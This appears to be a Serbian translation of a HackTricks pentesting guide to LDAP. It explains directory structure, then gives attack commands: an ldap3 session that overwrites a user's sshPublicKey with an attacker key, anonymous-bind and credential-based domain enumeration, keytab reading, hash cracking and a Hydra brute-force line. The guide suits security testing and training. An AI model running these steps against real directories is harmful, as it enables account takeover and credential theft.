Upotreba LDAP (Protokol za pristup lakim direktorijumima) je prvenstveno za lociranje raznih entiteta kao što su organizacije, pojedinci i resursi poput fajlova i uređaja unutar mreža, kako javnih tako i privatnih. Pruža pojednostavljen pristup u poređenju sa svojim prethodnikom, DAP, imajući manji kod.
LDAP direktorijumi su strukturirani tako da omogućavaju njihovu distribuciju preko više servera, pri čemu svaki server sadrži repliciranu i sinkronizovanu verziju direktorijuma, koja se naziva Agenta sistema direktorijuma (DSA). Odgovornost za obradu zahteva leži isključivo na LDAP serveru, koji može komunicirati sa drugim DSA-ima po potrebi kako bi pružio jedinstven odgovor tražiocu.
Organizacija LDAP direktorijuma podseća na stablo hijerarhije, počinjući od korenskog direktorijuma na vrhu. Ovo se grana na zemlje, koje se dalje dele na organizacije, a zatim na organizacione jedinice koje predstavljaju različite divizije ili odeljenja, konačno dostižući nivo pojedinačnih entiteta, uključujući i ljude i deljene resurse poput fajlova i štampača.
Podrazumevani port: 389 i 636(ldaps). Globalni katalog (LDAP u ActiveDirectory) je dostupan po defaultu na portovima 3268 i 3269 za LDAPS.
PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
LDAP Data Interchange Format
LDIF (LDAP Data Interchange Format) definiše sadržaj direktorijuma kao skup zapisa. Takođe može predstavljati zahteve za ažuriranje (Dodaj, Izmeni, Obriši, Preimenuj).
Linije 5-8 definišu prvi nivo domena moneycorp (moneycorp.local)
Linije 10-16 definišu 2 organizacione jedinice: dev i sales
Linije 18-26 kreiraju objekat domena i dodeljuju atribute sa vrednostima
Write data
Imajte na umu da ako možete da modifikujete vrednosti, mogli biste da izvršite zaista zanimljive akcije. Na primer, zamislite da možete promeniti informacije o "sshPublicKey" vašeg korisnika ili bilo kog korisnika. Veoma je verovatno da ako ovaj atribut postoji, onda ssh čita javne ključeve iz LDAP-a. Ako možete da modifikujete javni ključ korisnika, moći ćete da se prijavite kao taj korisnik čak i ako autentifikacija lozinkom nije omogućena u ssh.
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/>>> importldap3>>> server=ldap3.Server('x.x.x.x',port=636,use_ssl=True)>>> connection=ldap3.Connection(server,'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN','PASSWORD',auto_bind=True)>>> connection.bind()True>>> connection.extend.standard.who_am_i()u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
Sniff clear text credentials
Ako se LDAP koristi bez SSL-a, možete sniff-ovati kredencijale u čistom tekstu u mreži.
Takođe, možete izvršiti MITM napad u mreži između LDAP servera i klijenta. Ovde možete napraviti Downgrade Attack tako da klijent koristi kredencijale u čistom tekstu za prijavu.
Ako se koristi SSL možete pokušati da napravite MITM kao što je pomenuto iznad, ali nudeći lažni sertifikat, ako korisnik to prihvati, možete smanjiti metodu autentifikacije i ponovo videti kredencijale.
Anonymous Access
Bypass TLS SNI check
Prema ovoj analizi, samo pristupanjem LDAP serveru sa proizvoljnim imenom domena (kao što je company.com) mogao je da kontaktira LDAP servis i izvuče informacije kao anonimni korisnik:
LDAP anonimni vezovi omogućavaju neautentifikovanim napadačima da preuzmu informacije iz domena, kao što su potpuni spisak korisnika, grupa, računara, atributa korisničkih naloga i politika lozinki domena. Ovo je nasleđena konfiguracija, i od Windows Server 2003, samo autentifikovani korisnici su ovlašćeni da pokreću LDAP zahteve.
Međutim, administratori su možda morali da konfigurišu određenu aplikaciju da dozvoli anonimne vezove i dali više pristupa nego što je bilo predviđeno, čime su neautentifikovanim korisnicima omogućili pristup svim objektima u AD.
Validne kredencijale
Ako imate validne kredencijale za prijavu na LDAP server, možete izvući sve informacije o Domenskom Administratoru koristeći:
Windapsearch je Python skripta koja je korisna za enumeraciju korisnika, grupa i računara iz Windows domena koristeći LDAP upite.
# Get computerspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--computers# Get groupspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--groups# Get userspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--da# Get Domain Adminspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--da# Get Privileged Userspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--privileged-users
ldapsearch
Proverite null kredencijale ili da li su vaši kredencijali validni:
# CREDENTIALS NOT VALID RESPONSEsearch:2result:1Operationserrortext:000004DC:LdapErr:DSID-0C090A4C,comment:Inordertoperformthisoperationasuccessfulbindmustbecompletedontheconnection.,data0,v3839
Ako pronađete nešto što kaže da "bind mora biti završen" to znači da su akreditivi netačni.
#Read keytab file./klist-k/etc/krb5.keytab#Get known domains info./get-status./lsaget-status#Get basic metrics./get-metrics./lsaget-metrics#Get users./enum-users./lsaenum-users#Get groups./enum-groups./lsaenum-groups#Get all kind of objects./enum-objects./lsaenum-objects#Get groups of a user./list-groups-for-user<username>./lsalist-groups-for-user<username>#Get groups of each user./enum-users|grep"Name:"|sed-e"s,\\\,\\\\\\\,g"|awk'{print $2}'|whilereadname; do./list-groups-for-user"$name"; echo-e"========================\n"; done#Get users of a group./enum-members--by-name"domain admins"./lsaenum-members--by-name"domain admins"#Get users of each group./enum-groups|grep"Name:"|sed-e"s,\\\,\\\\\\\,g"|awk'{print $2}'|whilereadname; doecho"$name"; ./enum-members--by-name"$name"; echo-e"========================\n"; done#Get description of each user./adtool-asearch-user--nameCN="*"--keytab=/etc/krb5.keytab-n<Username>|grep"CN"|whilereadline; doecho"$line";./adtool--keytab=/etc/krb5.keytab-n<username>-alookup-object--dn="$line"--attr"description";echo"======================"done
Možete nahraniti john sa hash-om lozinke (od '{SSHA}' do 'structural' bez dodavanja 'structural').
Konfiguracione datoteke
General
containers.ldif
ldap.cfg
ldap.conf
ldap.xml
ldap-config.xml
ldap-realm.xml
slapd.conf
IBM SecureWay V3 server
V3.sas.oc
Microsoft Active Directory server
msadClassesAttrs.ldif
Netscape Directory Server 4
nsslapd.sas_at.conf
nsslapd.sas_oc.conf
OpenLDAP directory server
slapd.sas_at.conf
slapd.sas_oc.conf
Sun ONE Directory Server 5.1
75sas.ldif
HackTricks Automatske Komande
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
https://book.hacktricks.xyz/pentesting/pentesting-ldap
Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}
Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x
Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f